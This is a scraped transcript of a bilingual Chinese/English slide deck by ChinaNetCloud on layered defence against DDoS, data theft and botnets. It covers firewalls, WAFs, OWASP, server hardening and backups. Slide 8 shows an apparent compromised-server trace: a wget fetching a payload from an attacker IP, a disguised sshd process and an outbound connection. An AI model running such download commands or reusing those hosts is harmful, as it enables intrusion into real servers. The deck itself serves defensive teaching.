![扫描二维码获取更多
8
Security Problem #3 – BotNETs
第三个安全问题-僵尸网络
• Break In 攻入
• Install Root Kit 安装
• Call home for control 呼叫
• Do evil 作恶
Apr 23 14:34:03 [/root]# wget http://61.147.103.146:999/IP
root 1451 0.1 0.0 75196 1260 ? Ssl 00:54 1:36 /root/sshd
sshd 1451 root 4u IPv4 318269 0t0 TCP :22839->36.251.187.212:13800 (ESTABLISHED
云络科技 – 从不同层面抵抗外部攻击](https://image.slidesharecdn.com/securityspeechcn-160803072316/85/ChinaNetCloud-Online-Lecture-Fight-Against-External-Attacks-From-Different-Levels-8-320.jpg)
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different Levels
- 1. Copyright © 2016 ChinaNetCloud新系统的搭建与管理 ● 现有系统的优化与管理 ● 公有云和私有云的运维管理 管理全球互联网服务器 从不同层面抵抗外部攻击 云络 王 寒 扫描二维码获取更多
- 5. 5 当今三大安全问题 DDoS 数据盗窃 Botnets 僵尸网络 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击
- 6. 6 Security Problem #1 – DDoS 第一安全问题-DDoS • For Fun 捣蛋 • Get Money 赚钱 • Competitors 竞争 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击
- 7. 7 • Steal Money 偷钱 • Steal/Sell Data 偷数据 • Steal Code 偷代码 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击 Security Problem #2 – Stealing Data 第二安全问题-数据盗窃
- 8. 扫描二维码获取更多 8 Security Problem #3 – BotNETs 第三个安全问题-僵尸网络 • Break In 攻入 • Install Root Kit 安装 • Call home for control 呼叫 • Do evil 作恶 Apr 23 14:34:03 [/root]# wget http://61.147.103.146:999/IP root 1451 0.1 0.0 75196 1260 ? Ssl 00:54 1:36 /root/sshd sshd 1451 root 4u IPv4 318269 0t0 TCP :22839->36.251.187.212:13800 (ESTABLISHED 云络科技 – 从不同层面抵抗外部攻击
- 9. 9 四层安全 系统网络 代码 运维 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击
- 10. 10 网络安全 • DDoS 攻击1 Overload Bandwidth 带宽超载 • DDoS 攻击2 Overload Servers 服务器超载 • Cloud Filtering – Anquanbao 安全宝 • CDN, IDC-CDN, IDC硬件支持 DDoS 策略 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击
- 11. 11 系统安全 • Required – Basic protection 要求-基本的保护 • Basic filtering 基本的过滤 • NAT inbound • ssh, monitoring • NAT outbound • Backups, DNS, ntp, updates WAF 网页应用防火墙 传统防火墙 • Base on HTTP analysis 基于HTTP的请求分析 • Web漏洞攻击,SQL注入,XSS跨站,网页爬虫 • Dedicated Hardware 专有硬件设备 • Palo Alto Networks • Software / Virtual 软件/虚拟服务 • Anquanbao - 安全宝 • Aliyun Cloud Shell - 云盾 • Filtering & Limiting 过滤和限制 • IP, agent, url, session 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击
- 12. 12 代码安全 —— OWASP项目 http://owasp.org.cn 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击
- 13. 13 代码安全 —— 代码扫描 • Best practice — OWASP 最佳实践 • Find new problems 找到新问题 • As you update 更新 • Third parties 第三方 • New exploits 新的改进 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击
- 14. 14 运维安全 —— 经常被遗忘 • Often forgotten 经常被遗忘 • Often use defaults 经常采取默认设置 • Or random Google search 或用谷歌搜索配置 • Source of great danger 风险的发源地 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击
- 15. 15 运维安全 —— 服务器 • Best practices 最佳实践 • Lots of small issues 许多细小问题 • Running user - 用户运行 • File permissions - 文件许可 • Dangerous uploads - PHP inside JPEGs 危险的上传 • SSL – Heartbleed, etc. APP 服务器Web 服务器 • Best Practices 最佳实践 • Delete example APPs 删除样例 • Delete tools (Tomcat) 删除工具 • Patch Software (Java!) 软件补丁 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击
- 16. 16 运维安全 —— 服务器 数据库 • Use Best Practices 最佳实践 • Secure Configuration 安全配置 • Limited User Permission 限制用户许可 • Separate User for each App 区分每个APP的用户 • Safe File Permissions 安全的文件许可 • Log SQL if possible 尽可能记录SQL 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击
- 17. 17 运维安全 —— 操作系统 • Hardened OS 加固 • Iptables 防火墙 • Run Users 用户运行 • File permissions 文件许可 • Logging 日志 • Scanning (ClamAV) 扫描 • Track activity 轨迹追踪 • Automate 自动 • System Updates 系统升级 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击
- 18. 18 运维安全 —— 网络 • VPC on Clouds – Separate 使用公共云上隔离的私有网络 • Consider Out-of-Band Link (DDoS) 考虑带外数据链接 • Firewalls – Front & Middle 防火墙-前端&中间 • Secure Configuration 安全配置 • Separate test/dev network 区分测试/开发 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击
- 19. 19 运维安全 —— 云平台 • Best Practice 最佳实践 • Control Access 控制登录权限 • Separate Backups 备份隔离 • Can delete EVERYTHING 会被意外删除 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击
- 20. 20 运维安全 —— 备份安全 • Backups ARE part of Security 备份属于安全管理的范畴 • If all else fails, use backups 若发生意外,使用备份 • Keep them Secure 安全备份 • Avoid Theft & Tampering 防止盗窃或恶意企图 • Read-Only is Best 最好采用只读 运维安全 —— 安全监控 运维安全 —— 审计 Deep Check to Find Problems 深入检查,发现问题 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击
- 21. 总结 非常重要 越来越难 专家帮助工具繁多 扫描二维码获取更多 21云络科技 – 从不同层面抵抗外部攻击
- 22. 22 谢 谢! 扫描二维码获取更多 云络科技 – 从不同层面抵抗外部攻击